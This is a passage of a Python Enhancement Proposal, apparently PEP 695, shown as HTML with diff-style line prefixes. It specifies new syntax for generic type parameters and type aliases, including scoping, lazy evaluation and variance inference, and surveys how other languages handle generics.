Type variables defined within the global scope also need to be given a name +that starts with an underscore to indicate that the variable is private to +the module. Globally-defined type variables are also often given names to +indicate their variance, leading to cumbersome names like “_T_contra” and +“_KT_co”. The current mechanisms for allocating type variables also requires +the developer to supply a redundant name in quotes (e.g. T = TypeVar("T")). +This PEP eliminates the need for the redundant name and cumbersome +variable names.

+

Defining type parameters today requires importing the TypeVar and +Generic symbols from the typing module. Over the past several releases +of Python, efforts have been made to eliminate the need to import typing +symbols for common use cases, and the PEP furthers this goal.

+
+
+
+

Summary Examples

+

Defining a generic class prior to this PEP looks something like this.

+
from typing import Generic, TypeVar
+
+_T_co = TypeVar("_T_co", covariant=True, bound=str)
+
+class ClassA(Generic[_T_co]):
+    def method1(self) -> _T_co:
+        ...
+
+
+

With the new syntax, it looks like this.

+
class ClassA[T: str]:
+    def method1(self) -> T:
+        ...
+
+
+

Here is an example of a generic function today.

+
from typing import TypeVar
+
+_T = TypeVar("_T")
+
+def func(a: _T, b: _T) -> _T:
+    ...
+
+
+

And the new syntax.

+
def func[T](a: T, b: T) -> T:
+    ...
+
+
+

Here is an example of a generic type alias today.

+
from typing import TypeAlias
+
+_T = TypeVar("_T")
+
+ListOrSet: TypeAlias = list[_T] | set[_T]
+
+
+

And with the new syntax.

+
type ListOrSet[T] = list[T] | set[T]
+
+
+
+
+

Specification

+
+

Type Parameter Declarations

+

Here is a new syntax for declaring type parameters for generic +classes, functions, and type aliases. The syntax adds support for +a comma-delimited list of type parameters in square brackets after +the name of the class, function, or type alias.

+

Simple (non-variadic) type variables are declared with an unadorned name. +Variadic type variables are preceded by * (see PEP 646 for details). +Parameter specifications are preceded by ** (see PEP 612 for details).

+
# This generic class is parameterized by a TypeVar T, a
+# TypeVarTuple Ts, and a ParamSpec P.
+class ChildClass[T, *Ts, **P]: ...
+
+
+

There is no need to include Generic as a base class. Its inclusion as +a base class is implied by the presence of type parameters, and it will +automatically be included in the __mro__ and __orig_bases__ attributes +for the class. The explicit use of a Generic base class will result in a +runtime error.

+
class ClassA[T](Generic[T]): ...  # Runtime error
+
+
+

A Protocol base class with type arguments may generate a runtime +error. Type checkers should generate an error in this case because +the use of type arguments is not needed, and the order of type parameters +for the class are no longer dictated by their order in the Protocol +base class.

+
class ClassA[S, T](Protocol): ... # OK
+
+class ClassB[S, T](Protocol[S, T]): ... # Recommended type checker error
+
+
+

Type parameter names within a generic class, function, or type alias must be +unique within that same class, function, or type alias. A duplicate name +generates a syntax error at compile time. This is consistent with the +requirement that parameter names within a function signature must be unique.

+
class ClassA[T, *T]: ... # Syntax Error
+
+def func1[T, **T](): ... # Syntax Error
+
+
+

Class type parameter names are mangled if they begin with a double +underscore, to avoid complicating the name lookup mechanism for names used +within the class. However, the __name__ attribute of the type parameter +will hold the non-mangled name.

+
+
+

Upper Bound Specification

+

For a non-variadic type parameter, an “upper bound” type can be specified +through the use of a type annotation expression. If an upper bound is +not specified, the upper bound is assumed to be object.

+
class ClassA[T: str]: ...
+
+
+

The specified upper bound type must use an expression form that is allowed in +type annotations. More complex expression forms should be flagged +as an error by a type checker. Quoted forward references are allowed.

+

The specified upper bound type must be concrete. An attempt to use a generic +type should be flagged as an error by a type checker. This is consistent with +the existing rules enforced by type checkers for a TypeVar constructor call.

+
class ClassA[T: dict[str, int]]: ...  # OK
+
+class ClassB[T: "ForwardReference"]: ...  # OK
+
+class ClassC[V]:
+    class ClassD[T: dict[str, V]]: ...  # Type checker error: generic type
+
+class ClassE[T: [str, int]]: ...  # Type checker error: illegal expression form
+
+
+
+
+

Constrained Type Specification

+

PEP 484 introduced the concept of a “constrained type variable” which is +constrained to a set of two or more types. The new syntax supports this type +of constraint through the use of a literal tuple expression that contains +two or more types.

+
class ClassA[AnyStr: (str, bytes)]: ...  # OK
+
+class ClassB[T: ("ForwardReference", bytes)]: ...  # OK
+
+class ClassC[T: ()]: ...  # Type checker error: two or more types required
+
+class ClassD[T: (str, )]: ...  # Type checker error: two or more types required
+
+t1 = (bytes, str)
+class ClassE[T: t1]: ...  # Type checker error: literal tuple expression required
+
+
+

If the specified type is not a tuple expression or the tuple expression includes +complex expression forms that are not allowed in a type annotation, a type +checker should generate an error. Quoted forward references are allowed.

+
class ClassF[T: (3, bytes)]: ...  # Type checker error: invalid expression form
+
+
+

The specified constrained types must be concrete. An attempt to use a generic +type should be flagged as an error by a type checker. This is consistent with +the existing rules enforced by type checkers for a TypeVar constructor call.

+
class ClassG[T: (list[S], str)]: ...  # Type checker error: generic type
+
+
+
+
+

Runtime Representation of Bounds and Constraints

+

The upper bounds and constraints of TypeVar objects are accessible at +runtime through the __bound__ and __constraints__ attributes. +For TypeVar objects defined through the new syntax, these attributes +become lazily evaluated, as discussed under Lazy Evaluation below.

+
+
+

Generic Type Alias

+

We propose to introduce a new statement for declaring type aliases. Similar +to class and def statements, a type statement defines a scope +for type parameters.

+
# A non-generic type alias
+type IntOrStr = int | str
+
+# A generic type alias
+type ListOrSet[T] = list[T] | set[T]
+
+
+

Type aliases can refer to themselves without the use of quotes.

+
# A type alias that includes a forward reference
+type AnimalOrVegetable = Animal | "Vegetable"
+
+# A generic self-referential type alias
+type RecursiveList[T] = T | list[RecursiveList[T]]
+
+
+

The type keyword is a new soft keyword. It is interpreted as a keyword +only in this part of the grammar. In all other locations, it is assumed to +be an identifier name.

+

Type parameters declared as part of a generic type alias are valid only +when evaluating the right-hand side of the type alias.

+

As with typing.TypeAlias, type checkers should restrict the right-hand +expression to expression forms that are allowed within type annotations. +The use of more complex expression forms (call expressions, ternary operators, +arithmetic operators, comparison operators, etc.) should be flagged as an +error.

+

Type alias expressions are not allowed to use traditional type variables (i.e. +those allocated with an explicit TypeVar constructor call). Type checkers +should generate an error in this case.

+
T = TypeVar("T")
+type MyList = list[T]  # Type checker error: traditional type variable usage
+
+
+

We propose to deprecate the existing typing.TypeAlias introduced in +PEP 613. The new syntax eliminates its need entirely.

+
+
+

Runtime Type Alias Class

+

At runtime, a type statement will generate an instance of +typing.TypeAliasType. This class represents the type. Its attributes +include:

+
    +
  • __name__ is a str representing the name of the type alias
  • +
  • __type_params__ is a tuple of TypeVar, TypeVarTuple, or +ParamSpec objects that parameterize the type alias if it is generic
  • +
  • __value__ is the evaluated value of the type alias
  • +
+

All of these attributes are read-only.

+

The value of the type alias is evaluated lazily (see Lazy Evaluation below).

+
+
+

Type Parameter Scopes

+

When the new syntax is used, a new lexical scope is introduced, and this scope +includes the type parameters. Type parameters can be accessed by name +within inner scopes. As with other symbols in Python, an inner scope can +define its own symbol that overrides an outer-scope symbol of the same name. +This section provides a verbal description of the new scoping rules. +The Scoping Behavior section below specifies the behavior in terms +of a translation to near-equivalent existing Python code.

+

Type parameters are visible to other +type parameters declared elsewhere in the list. This allows type parameters +to use other type parameters within their definition. While there is currently +no use for this capability, it preserves the ability in the future to support +upper bound expressions or type argument defaults that depend on earlier +type parameters.

+

A compiler error or runtime exception is generated if the definition of an +earlier type parameter references a later type parameter even if the name is +defined in an outer scope.

+
# The following generates no compiler error, but a type checker
+# should generate an error because an upper bound type must be concrete,
+# and ``Sequence[S]`` is generic. Future extensions to the type system may
+# eliminate this limitation.
+class ClassA[S, T: Sequence[S]]: ...
+
+# The following generates no compiler error, because the bound for ``S``
+# is lazily evaluated. However, type checkers should generate an error.
+class ClassB[S: Sequence[T], T]: ...
+
+
+

A type parameter declared as part of a generic class is valid within the +class body and inner scopes contained therein. Type parameters are also +accessible when evaluating the argument list (base classes and any keyword +arguments) that comprise the class definition. This allows base classes +to be parameterized by these type parameters. Type parameters are not +accessible outside of the class body, including class decorators.

+
class ClassA[T](BaseClass[T], param = Foo[T]): ...  # OK
+
+print(T)  # Runtime error: 'T' is not defined
+
+@dec(Foo[T])  # Runtime error: 'T' is not defined
+class ClassA[T]: ...
+
+
+

A type parameter declared as part of a generic function is valid within +the function body and any scopes contained therein. It is also valid within +parameter and return type annotations. Default argument values for function +parameters are evaluated outside of this scope, so type parameters are +not accessible in default value expressions. Likewise, type parameters are not +in scope for function decorators.

+
def func1[T](a: T) -> T: ...  # OK
+
+print(T)  # Runtime error: 'T' is not defined
+
+def func2[T](a = list[T]): ...  # Runtime error: 'T' is not defined
+
+@dec(list[T])  # Runtime error: 'T' is not defined
+def func3[T](): ...
+
+
+

A type parameter declared as part of a generic type alias is valid within +the type alias expression.

+
type Alias1[K, V] = Mapping[K, V] | Sequence[K]
+
+
+

Type parameter symbols defined in outer scopes cannot be bound with +nonlocal statements in inner scopes.

+
S = 0
+
+def outer1[S]():
+    S = 1
+    T = 1
+
+    def outer2[T]():
+
+        def inner1():
+            nonlocal S  # OK because it binds variable S from outer1
+            nonlocal T  # Syntax error: nonlocal binding not allowed for type parameter
+
+        def inner2():
+            global S  # OK because it binds variable S from global scope
+
+
+

The lexical scope introduced by the new type parameter syntax is unlike +traditional scopes introduced by a def or class statement. A type +parameter scope acts more like a temporary “overlay” to the containing scope. +The only new symbols contained +within its symbol table are the type parameters defined using the new syntax. +References to all other symbols are treated as though they were found within +the containing scope. This allows base class lists (in class definitions) and +type annotation expressions (in function definitions) to reference symbols +defined in the containing scope.

+
class Outer:
+    class Private:
+        pass
+
+    # If the type parameter scope was like a traditional scope,
+    # the base class 'Private' would not be accessible here.
+    class Inner[T](Private, Sequence[T]):
+        pass
+
+    # Likewise, 'Inner' would not be available in these type annotations.
+    def method1[T](self, a: Inner[T]) -> Inner[T]:
+        return a
+
+
+

The compiler allows inner scopes to define a local symbol that overrides an +outer-scoped type parameter.

+

Consistent with the scoping rules defined in PEP 484, type checkers should +generate an error if inner-scoped generic classes, functions, or type aliases +reuse the same type parameter name as an outer scope.

+
T = 0
+
+@decorator(T)  # Argument expression `T` evaluates to 0
+class ClassA[T](Sequence[T]):
+    T = 1
+
+    # All methods below should result in a type checker error
+    # "type parameter 'T' already in use" because they are using the
+    # type parameter 'T', which is already in use by the outer scope
+    # 'ClassA'.
+    def method1[T](self):
+        ...
+
+    def method2[T](self, x = T):  # Parameter 'x' gets default value of 1
+        ...
+
+    def method3[T](self, x: T):  # Parameter 'x' has type T (scoped to method3)
+        ...
+
+
+

Symbols referenced in inner scopes are resolved using existing rules except +that type parameter scopes are also considered during name resolution.

+
T = 0
+
+# T refers to the global variable
+print(T)  # Prints 0
+
+class Outer[T]:
+    T = 1
+
+    # T refers to the local variable scoped to class 'Outer'
+    print(T)  # Prints 1
+
+    class Inner1:
+        T = 2
+
+        # T refers to the local type variable within 'Inner1'
+        print(T)  # Prints 2
+
+        def inner_method(self):
+            # T refers to the type parameter scoped to class 'Outer';
+            # If 'Outer' did not use the new type parameter syntax,
+            # this would instead refer to the global variable 'T'
+            print(T)  # Prints 'T'
+
+    def outer_method(self):
+        T = 3
+
+        # T refers to the local variable within 'outer_method'
+        print(T)  # Prints 3
+
+        def inner_func():
+            # T refers to the variable captured from 'outer_method'
+            print(T)  # Prints 3
+
+
+

When the new type parameter syntax is used for a generic class, assignment +expressions are not allowed within the argument list for the class definition. +Likewise, with functions that use the new type parameter syntax, assignment +expressions are not allowed within parameter or return type annotations, nor +are they allowed within the expression that defines a type alias, or within +the bounds and constraints of a TypeVar. Similarly, yield, yield from, +and await expressions are disallowed in these contexts.

+

This restriction is necessary because expressions evaluated within the +new lexical scope should not introduce symbols within that scope other than +the defined type parameters, and should not affect whether the enclosing function +is a generator or coroutine.

+
class ClassA[T]((x := Sequence[T])): ...  # Syntax error: assignment expression not allowed
+
+def func1[T](val: (x := int)): ...  # Syntax error: assignment expression not allowed
+
+def func2[T]() -> (x := Sequence[T]): ...  # Syntax error: assignment expression not allowed
+
+type Alias1[T] = (x := list[T])  # Syntax error: assignment expression not allowed
+
+
+
+
+

Accessing Type Parameters at Runtime

+

A new attribute called __type_params__ is available on generic classes, +functions, and type aliases. This attribute is a tuple of the +type parameters that parameterize the class, function, or alias. +The tuple contains TypeVar, ParamSpec, and TypeVarTuple instances.

+

Type parameters declared using the new syntax will not appear within the +dictionary returned by globals() or locals().

+
+
+

Variance Inference

+

This PEP eliminates the need for variance to be specified for type +parameters. Instead, type checkers will infer the variance of type parameters +based on their usage within a class. Type parameters are inferred to be +invariant, covariant, or contravariant depending on how they are used.

+

Python type checkers already include the ability to determine the variance of +type parameters for the purpose of validating variance within a generic +protocol class. This capability can be used for all classes (whether or not +they are protocols) to calculate the variance of each type parameter.

+

The algorithm for computing the variance of a type parameter is as follows.

+

For each type parameter in a generic class:

+

1. If the type parameter is variadic (TypeVarTuple) or a parameter +specification (ParamSpec), it is always considered invariant. No further +inference is needed.

+

2. If the type parameter comes from a traditional TypeVar declaration and +is not specified as infer_variance (see below), its variance is specified +by the TypeVar constructor call. No further inference is needed.

+

3. Create two specialized versions of the class. We’ll refer to these as +upper and lower specializations. In both of these specializations, +replace all type parameters other than the one being inferred by a dummy type +instance (a concrete anonymous class that is type compatible with itself and +assumed to meet the bounds or constraints of the type parameter). In +the upper specialized class, specialize the target type parameter with +an object instance. This specialization ignores the type parameter’s +upper bound or constraints. In the lower specialized class, specialize +the target type parameter with itself (i.e. the corresponding type argument +is the type parameter itself).

+

4. Determine whether lower can be assigned to upper using normal type +compatibility rules. If so, the target type parameter is covariant. If not, +determine whether upper can be assigned to lower. If so, the target +type parameter is contravariant. If neither of these combinations are +assignable, the target type parameter is invariant.

+

Here is an example.

+
class ClassA[T1, T2, T3](list[T1]):
+    def method1(self, a: T2) -> None:
+        ...
+
+    def method2(self) -> T3:
+        ...
+
+
+

To determine the variance of T1, we specialize ClassA as follows:

+
upper = ClassA[object, Dummy, Dummy]
+lower = ClassA[T1, Dummy, Dummy]
+
+
+

We find that upper is not assignable to lower using normal type +compatibility rules defined in PEP 484. Likewise, lower is not assignable +to upper, so we conclude that T1 is invariant.

+

To determine the variance of T2, we specialize ClassA as follows:

+
upper = ClassA[Dummy, object, Dummy]
+lower = ClassA[Dummy, T2, Dummy]
+
+
+

Since upper is assignable to lower, T2 is contravariant.

+

To determine the variance of T3, we specialize ClassA as follows:

+
upper = ClassA[Dummy, Dummy, object]
+lower = ClassA[Dummy, Dummy, T3]
+
+
+

Since lower is assignable to upper, T3 is covariant.

+
+
+

Auto Variance For TypeVar

+

The existing TypeVar class constructor accepts keyword parameters named +covariant and contravariant. If both of these are False, the +type variable is assumed to be invariant. We propose to add another keyword +parameter named infer_variance indicating that a type checker should use +inference to determine whether the type variable is invariant, covariant or +contravariant. A corresponding instance variable __infer_variance__ can be +accessed at runtime to determine whether the variance is inferred. Type +variables that are implicitly allocated using the new syntax will always +have __infer_variance__ set to True.

+

A generic class that uses the traditional syntax may include combinations of +type variables with explicit and inferred variance.

+
T1 = TypeVar("T1", infer_variance=True)  # Inferred variance
+T2 = TypeVar("T2")  # Invariant
+T3 = TypeVar("T3", covariant=True)  # Covariant
+
+# A type checker should infer the variance for T1 but use the
+# specified variance for T2 and T3.
+class ClassA(Generic[T1, T2, T3]): ...
+
+
+
+
+

Compatibility with Traditional TypeVars

+

The existing mechanism for allocating TypeVar, TypeVarTuple, and +ParamSpec is retained for backward compatibility. However, these +“traditional” type variables should not be combined with type parameters +allocated using the new syntax. Such a combination should be flagged as +an error by type checkers. This is necessary because the type parameter +order is ambiguous.

+

It is OK to combine traditional type variables with new-style type parameters +if the class, function, or type alias does not use the new syntax. The +new-style type parameters must come from an outer scope in this case.

+
K = TypeVar("K")
+
+class ClassA[V](dict[K, V]): ...  # Type checker error
+
+class ClassB[K, V](dict[K, V]): ...  # OK
+
+class ClassC[V]:
+    # The use of K and V for "method1" is OK because it uses the
+    # "traditional" generic function mechanism where type parameters
+    # are implicit. In this case V comes from an outer scope (ClassC)
+    # and K is introduced implicitly as a type parameter for "method1".
+    def method1(self, a: V, b: K) -> V | K: ...
+
+    # The use of M and K are not allowed for "method2". A type checker
+    # should generate an error in this case because this method uses the
+    # new syntax for type parameters, and all type parameters associated
+    # with the method must be explicitly declared. In this case, ``K``
+    # is not declared by "method2", nor is it supplied by a new-style
+    # type parameter defined in an outer scope.
+    def method2[M](self, a: M, b: K) -> M | K: ...
+
+
+
+
+
+

Runtime Implementation

+
+

Grammar Changes

+

This PEP introduces a new soft keyword type. It modifies the grammar +in the following ways:

+
    +
  1. Addition of optional type parameter clause in class and def statements.
  2. +
+
type_params: '[' t=type_param_seq  ']'
+
+type_param_seq: a[asdl_typeparam_seq*]=','.type_param+ [',']
+
+type_param:
+    | a=NAME b=[type_param_bound]
+    | '*' a=NAME
+    | '**' a=NAME
+
+type_param_bound: ":" e=expression
+
+# Grammar definitions for class_def_raw and function_def_raw are modified
+# to reference type_params as an optional syntax element. The definitions
+# of class_def_raw and function_def_raw are simplified here for brevity.
+
+class_def_raw: 'class' n=NAME t=[type_params] ...
+
+function_def_raw: a=[ASYNC] 'def' n=NAME t=[type_params] ...
+
+
+
    +
  1. Addition of new type statement for defining type aliases.
  2. +
+
type_alias: "type" n=NAME t=[type_params] '=' b=expression
+
+
+
+
+

AST Changes

+

This PEP introduces a new AST node type called TypeAlias.

+
TypeAlias(expr name, typeparam* typeparams, expr value)
+
+
+

It also adds an AST node type that represents a type parameter.

+
typeparam = TypeVar(identifier name, expr? bound)
+    | ParamSpec(identifier name)
+    | TypeVarTuple(identifier name)
+
+
+

Bounds and constraints are represented identically in the AST. In the implementation, +any expression that is a Tuple AST node is treated as a constraint, and any other +expression is treated as a bound.

+

It also modifies existing AST node types FunctionDef, AsyncFunctionDef +and ClassDef to include an additional optional attribute called +typeparams that includes a list of type parameters associated with the +function or class.

+
+
+

Lazy Evaluation

+

This PEP introduces three new contexts where expressions may occur that represent +static types: TypeVar bounds, TypeVar constraints, and the value of type +aliases. These expressions may contain references to names +that are not yet defined. For example, type aliases may be recursive, or even mutually +recursive, and type variable bounds may refer back to the current class. If these +expressions were evaluated eagerly, users would need to enclose such expressions in +quotes to prevent runtime errors. PEP 563 and PEP 649 detail the problems with +this situation for type annotations.

+

To prevent a similar situation with the new syntax proposed in this PEP, we propose +to use lazy evaluation for these expressions, similar to the approach in PEP 649. +Specifically, each expression will be saved in a code object, and the code object +is evaluated only when the corresponding attribute is accessed (TypeVar.__bound__, +TypeVar.__constraints__, or TypeAlias.__value__). After the value is +successfully evaluated, the value is saved and later calls will return the same value +without re-evaluating the code object.

+

If PEP 649 is implemented, additional evaluation mechanisms should be added to +mirror the options that PEP provides for annotations. In the current version of the +PEP, that might include adding an __evaluate_bound__ method to TypeVar taking +a format parameter with the same meaning as in PEP 649’s __annotate__ method +(and a similar __evaluate_constraints__ method, as well as an __evaluate_value__ +method on TypeAliasType). +However, until PEP 649 is accepted and implemented, only the default evaluation format +(PEP 649’s “VALUE” format) will be supported.

+

As a consequence of lazy evaluation, the value observed for an attribute may +depend on the time the attribute is accessed.

+
X = int
+
+class Foo[T: X, U: X]:
+    t, u = T, U
+
+print(Foo.t.__bound__)  # prints "int"
+X = str
+print(Foo.u.__bound__)  # prints "str"
+
+
+

Similar examples affecting type annotations can be constructed using the +semantics of PEP 563 or PEP 649.

+

A naive implementation of lazy evaluation would handle class namespaces +incorrectly, because functions within a class do not normally have access to +the enclosing class namespace. The implementation will retain a reference to +the class namespace so that class-scoped names are resolved correctly.

+
+
+

Scoping Behavior

+

The new syntax requires a new kind of scope that behaves differently +from existing scopes in Python. Thus, the new syntax cannot be described exactly in terms of +existing Python scoping behavior. This section specifies these scopes +further by reference to existing scoping behavior: the new scopes behave +like function scopes, except for a number of minor differences listed below.

+

All examples include functions introduced with the pseudo-keyword def695. +This keyword will not exist in the actual language; it is used to +clarify that the new scopes are for the most part like function scopes.

+

def695 scopes differ from regular function scopes in the following ways:

+
    +
  • If a def695 scope is immediately within a class scope, or within another +def695 scope that is immediately within a class scope, then names defined +in that class scope can be accessed within the def695 scope. (Regular functions, +by contrast, cannot access names defined within an enclosing class scope.)
  • +
  • The following constructs are disallowed directly within a def695 scope, though +they may be used within other scopes nested inside a def695 scope:
      +
    • yield
    • +
    • yield from
    • +
    • await
    • +
    • := (walrus operator)
    • +
    +
  • +
  • The qualified name (__qualname__) of objects (classes and functions) defined within def695 scopes +is as if the objects were defined within the closest enclosing scope.
  • +
  • Names bound within def695 scopes cannot be rebound with a nonlocal statement in nested scopes.
  • +
+

def695 scopes are used for the evaluation of several new syntactic constructs proposed +in this PEP. Some are evaluated eagerly (when a type alias, function, or class is defined); others are +evaluated lazily (only when evaluation is specifically requested). In all cases, the scoping semantics are identical:

+
    +
  • Eagerly evaluated values:
      +
    • The type parameters of generic type aliases
    • +
    • The type parameters and annotations of generic functions
    • +
    • The type parameters and base class expressions of generic classes
    • +
    +
  • +
  • Lazily evaluated values:
      +
    • The value of generic type aliases
    • +
    • The bounds of type variables
    • +
    • The constraints of type variables
    • +
    +
  • +
+

In the below translations, names that start with two underscores are internal to the implementation +and not visible to actual Python code. We use the following intrinsic functions, which in the real +implementation are defined directly in the interpreter:

+
    +
  • __make_typealias(*, name, type_params=(), evaluate_value): Creates a new typing.TypeAlias object with the given +name, type parameters, and lazily evaluated value. The value is not evaluated until the __value__ attribute +is accessed.
  • +
  • __make_typevar_with_bound(*, name, evaluate_bound): Creates a new typing.TypeVar object with the given +name and lazily evaluated bound. The bound is not evaluated until the __bound__ attribute is accessed.
  • +
  • __make_typevar_with_constraints(*, name, evaluate_constraints): Creates a new typing.TypeVar object with the given +name and lazily evaluated constraints. The constraints are not evaluated until the __constraints__ attribute +is accessed.
  • +
+

Non-generic type aliases are translated as follows:

+
type Alias = int
+
+
+

Equivalent to:

+
def695 __evaluate_Alias():
+    return int
+
+Alias = __make_typealias(name='Alias', evaluate_value=__evaluate_Alias)
+
+
+

Generic type aliases:

+
type Alias[T: int] = list[T]
+
+
+

Equivalent to:

+
def695 __generic_parameters_of_Alias():
+    def695 __evaluate_T_bound():
+        return int
+    T = __make_typevar_with_bound(name='T', evaluate_bound=__evaluate_T_bound)
+
+    def695 __evaluate_Alias():
+        return list[T]
+    return __make_typealias(name='Alias', type_params=(T,), evaluate_value=__evaluate_Alias)
+
+Alias = __generic_parameters_of_Alias()
+
+
+

Generic functions:

+
def f[T](x: T) -> T:
+    return x
+
+
+

Equivalent to:

+
def695 __generic_parameters_of_f():
+    T = typing.TypeVar(name='T')
+
+    def f(x: T) -> T:
+        return x
+    f.__type_params__ = (T,)
+    return f
+
+f = __generic_parameters_of_f()
+
+
+

A fuller example of generic functions, illustrating the scoping behavior of defaults, decorators, and bounds. +Note that this example does not use ParamSpec correctly, so it should be rejected by a static type checker. +It is however valid at runtime, and it us used here to illustrate the runtime semantics.

+
@decorator
+def f[T: int, U: (int, str), *Ts, **P](
+    x: T = SOME_CONSTANT,
+    y: U,
+    *args: *Ts,
+    **kwargs: P.kwargs,
+) -> T:
+    return x
+
+
+

Equivalent to:

+
__default_of_x = SOME_CONSTANT  # evaluated outside the def695 scope
+def695 __generic_parameters_of_f():
+    def695 __evaluate_T_bound():
+        return int
+    T = __make_typevar_with_bound(name='T', evaluate_bound=__evaluate_T_bound)
+
+    def695 __evaluate_U_constraints():
+        return (int, str)
+    U = __make_typevar_with_constraints(name='U', evaluate_constraints=__evaluate_U_constraints)
+
+    Ts = typing.TypeVarTuple("Ts")
+    P = typing.ParamSpec("P")
+
+    def f(x: T = __default_of_x, y: U, *args: *Ts, **kwargs: P.kwargs) -> T:
+        return x
+    f.__type_params__ = (T, U, Ts, P)
+    return f
+
+f = decorator(__generic_parameters_of_f())
+
+
+

Generic classes:

+
class C[T](Base):
+    def __init__(self, x: T):
+        self.x = x
+
+
+

Equivalent to:

+
def695 __generic_parameters_of_C():
+    T = typing.TypeVar('T')
+    class C(Base):
+        __type_params__ = (T,)
+        def __init__(self, x: T):
+            self.x = x
+   return C
+
+C = __generic_parameters_of_C()
+
+
+

The biggest divergence from existing behavior for def695 scopes +is the behavior within class scopes. This divergence is necessary +so that generics defined within classes behave in an intuitive way:

+
class C:
+    class Nested: ...
+    def generic_method[T](self, x: T, y: Nested) -> T: ...
+
+
+

Equivalent to:

+
class C:
+    class Nested: ...
+
+    def695 __generic_parameters_of_generic_method():
+        T = typing.TypeVar('T')
+
+        def generic_method(self, x: T, y: Nested) -> T: ...
+        return generic_method
+
+    generic_method = __generic_parameters_of_generic_method()
+
+
+

In this example, the annotations for x and y are evaluated within +a def695 scope, because they need access to the type parameter T +for the generic method. However, they also need access to the Nested +name defined within the class namespace. If def695 scopes behaved +like regular function scopes, Nested would not be visible within the +function scope. Therefore, def695 scopes that are immediately within +class scopes have access to that class scope, as described above.

+
+
+

Library Changes

+

Several classes in the typing module that are currently implemented in +Python must be partially implemented in C. This includes TypeVar, +TypeVarTuple, ParamSpec, and Generic, and the new class +TypeAliasType (described above). The implementation may delegate to the +Python version of typing.py for some behaviors that interact heavily with +the rest of the module. The +documented behaviors of these classes should not change.

+
+
+
+

Reference Implementation

+

This proposal is prototyped in +CPython PR #103764.

+

The Pyright type checker supports the behavior described in this PEP.

+
+
+

Rejected Ideas

+
+

Prefix Clause

+

We explored various syntactic options for specifying type parameters that +preceded def and class statements. One such variant we considered +used a using clause as follows:

+
using S, T
+class ClassA: ...
+
+
+

This option was rejected because the scoping rules for the type parameters +were less clear. Also, this syntax did not interact well with class and +function decorators, which are common in Python. Only one other popular +programming language, C++, uses this approach.

+

We likewise considered prefix forms that looked like decorators (e.g., +@using(S, T)). This idea was rejected because such forms would be confused +with regular decorators, and they would not compose well with existing +decorators. Furthermore, decorators are logically executed after the statement +they are decorating, so it would be confusing for them to introduce symbols +(type parameters) that are visible within the “decorated” statement, which is +logically executed before the decorator itself.

+
+
+

Angle Brackets

+

Many languages that support generics make use of angle brackets. (Refer to +the table at the end of Appendix A for a summary.) We explored the use of +angle brackets for type parameter declarations in Python, but we ultimately +rejected it for two reasons. First, angle brackets are not considered +“paired” by the Python scanner, so end-of-line characters between a < +and > token are retained. That means any line breaks within a list of +type parameters would require the use of unsightly and cumbersome \ escape +sequences. Second, Python has already established the use of square brackets +for explicit specialization of a generic type (e.g., list[int]). We +concluded that it would be inconsistent and confusing to use angle brackets +for generic declarations but square brackets for explicit specialization. All +other languages that we surveyed were consistent in this regard.

+
+
+

Bounds Syntax

+

We explored various syntactic options for specifying the bounds and constraints +for a type variable. We considered, but ultimately rejected, the use +of a <: token like in Scala, the use of an extends or with +keyword like in various other languages, and the use of a function call +syntax similar to today’s typing.TypeVar constructor. The simple colon +syntax is consistent with many other programming languages (see Appendix A), +and it was heavily preferred by a cross section of Python developers who +were surveyed.

+
+
+

Explicit Variance

+

We considered adding syntax for specifying whether a type parameter is intended +to be invariant, covariant, or contravariant. The typing.TypeVar mechanism +in Python requires this. A few other languages including Scala and C# +also require developers to specify the variance. We rejected this idea because +variance can generally be inferred, and most modern programming languages +do infer variance based on usage. Variance is an advanced topic that +many developers find confusing, so we want to eliminate the need to +understand this concept for most Python developers.

+
+
+

Name Mangling

+

When considering implementation options, we considered a “name mangling” +approach where each type parameter was given a unique “mangled” name by the +compiler. This mangled name would be based on the qualified name of the +generic class, function or type alias it was associated with. This approach +was rejected because qualified names are not necessarily unique, which means +the mangled name would need to be based on some other randomized value. +Furthermore, this approach is not compatible with techniques used for +evaluating quoted (forward referenced) type annotations.

+
+
+
+

Appendix A: Survey of Type Parameter Syntax

+

Support for generic types is found in many programming languages. In this +section, we provide a survey of the options used by other popular programming +languages. This is relevant because familiarity with other languages will +make it easier for Python developers to understand this concept. We provide +additional details here (for example, default type argument support) that +may be useful when considering future extensions to the Python type system.

+
+

C++

+

C++ uses angle brackets in combination with keywords template and +typename to declare type parameters. It uses angle brackets for +specialization.

+

C++20 introduced the notion of generalized constraints, which can act +like protocols in Python. A collection of constraints can be defined in +a named entity called a concept.

+

Variance is not explicitly specified, but constraints can enforce variance.

+

A default type argument can be specified using the = operator.

+
// Generic class
+template <typename>
+class ClassA
+{
+    // Constraints are supported through compile-time assertions.
+    static_assert(std::is_base_of<BaseClass, T>::value);
+
+public:
+    Container<T> t;
+};
+
+// Generic function with default type argument
+template <typename S = int>
+S func1(ClassA<S> a, S b) {};
+
+// C++20 introduced a more generalized notion of "constraints"
+// and "concepts", which are named constraints.
+
+// A sample concept
+template<typename T>
+concept Hashable = requires(T a)
+{
+    { std::hash<T>{}(a) } -> std::convertible_to<std::size_t>;
+};
+
+// Use of a concept in a template
+template<Hashable T>
+void func2(T value) {}
+
+// Alternative use of concept
+template<typename T> requires Hashable<T>
+void func3(T value) {}
+
+// Alternative use of concept
+template<typename T>
+void func3(T value) requires Hashable<T> {}
+
+
+
+
+

Java

+

Java uses angle brackets to declare type parameters and for specialization. +By default, type parameters are invariant. +The extends keyword is used to specify an upper bound. The super keyword +is used to specify a contravariant bound.

+

Java uses use-site variance. The compiler places limits on which methods and +members can be accessed based on the use of a generic type. Variance is +not specified explicitly.

+

Java provides no way to specify a default type argument.

+
// Generic class
+public class ClassA<T> {
+    public Container<T> t;
+
+    // Generic method
+    public <S extends Number> void method1(S value) { }
+
+    // Use site variance
+    public void method1(ClassA<? super Integer> value) { }
+}
+
+
+
+
+

C#

+

C# uses angle brackets to declare type parameters and for specialization. +The where keyword and a colon is used to specify the bound for a type +parameter.

+

C# uses declaration-site variance using the keywords in and out for +contravariance and covariance, respectively. By default, type parameters are +invariant.

+

C# provides no way to specify a default type argument.

+
// Generic class with bounds on type parameters
+public class ClassA<S, T>
+    where T : SomeClass1
+    where S : SomeClass2
+{
+    // Generic method
+    public void MyMethod<U>(U value) where U : SomeClass3 { }
+}
+
+// Contravariant and covariant type parameters
+public class ClassB<in S, out T>
+{
+    public T MyMethod(S value) { }
+}
+
+
+
+
+

TypeScript

+

TypeScript uses angle brackets to declare type parameters and for +specialization. The extends keyword is used to specify a bound. It can be +combined with other type operators such as keyof.

+

